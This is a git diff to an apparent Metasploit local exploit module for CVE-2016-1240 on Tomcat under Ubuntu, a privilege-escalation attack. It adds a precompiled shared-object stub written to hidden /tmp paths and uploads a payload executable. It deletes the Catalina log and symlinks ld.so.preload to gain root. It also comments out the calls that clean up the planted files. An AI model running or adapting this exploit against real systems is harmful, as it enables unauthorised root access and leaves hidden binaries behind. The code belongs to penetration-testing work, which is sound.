diff --git a/data/exploits/CVE-2016-1240/stub.so b/data/exploits/CVE-2016-1240/stub.so new file mode 100644 index 0000000000..48bacc039a Binary files /dev/null and b/data/exploits/CVE-2016-1240/stub.so differ diff --git a/modules/exploits/linux/local/tomcat_ubuntu_log_init_priv_esc.rb b/modules/exploits/linux/local/tomcat_ubuntu_log_init_priv_esc.rb index 71e7374713..5770d5d40d 100644 --- a/modules/exploits/linux/local/tomcat_ubuntu_log_init_priv_esc.rb +++ b/modules/exploits/linux/local/tomcat_ubuntu_log_init_priv_esc.rb @@ -133,18 +133,28 @@ class MetasploitModule < Msf::Exploit::Local ) print_good("Original #{catalina} backed up to #{path}") + if live_compile? + # upload our privesc stub + so_stub = ".#{rand_text_alphanumeric(5..10)}.so" + so_stub_path = "#{base_dir}/#{so_stub}" + payload_path = "#{base_dir}/.#{rand_text_alphanumeric(5..10)}" + + # Upload exploit stub + vprint_status "Compiling exploit stub: #{so_stub_path}" + upload_and_compile so_stub_path, strip_comments(exploit_data('CVE-2016-1240', 'privesc_preload.c').gsub('$BACKDOORPATH', payload_path)), '-Wall -fPIC -shared -ldl' + else + payload_path = '/tmp/.jMeY5vToQl' + so_stub = '.ny9NyKEPJ.so' + so_stub_path = "/tmp/#{so_stub}" + + write_file(so_stub_path, exploit_data('CVE-2016-1240', 'stub.so')) + end # Upload payload executable - payload_path = "#{base_dir}/.#{rand_text_alphanumeric(5..10)}" vprint_status("Uploading Payload to #{payload_path}") upload_and_chmodx payload_path, generate_payload_exe - register_file_for_cleanup(payload_path) + # register_file_for_cleanup(payload_path) - # upload our privesc stub - so_stub = ".#{rand_text_alphanumeric(5..10)}.so" - so_stub_path = "#{base_dir}/#{so_stub}" - vprint_status "Compiling exploit stub: #{so_stub_path}" - upload_and_compile so_stub_path, strip_comments(exploit_data('CVE-2016-1240', 'privesc_preload.c').gsub('$BACKDOORPATH', payload_path)), '-Wall -fPIC -shared -ldl' - register_file_for_cleanup(so_stub_path) + # register_file_for_cleanup(so_stub_path) # delete the log and symlink ld.so.preload vprint_status("Deleting #{catalina}")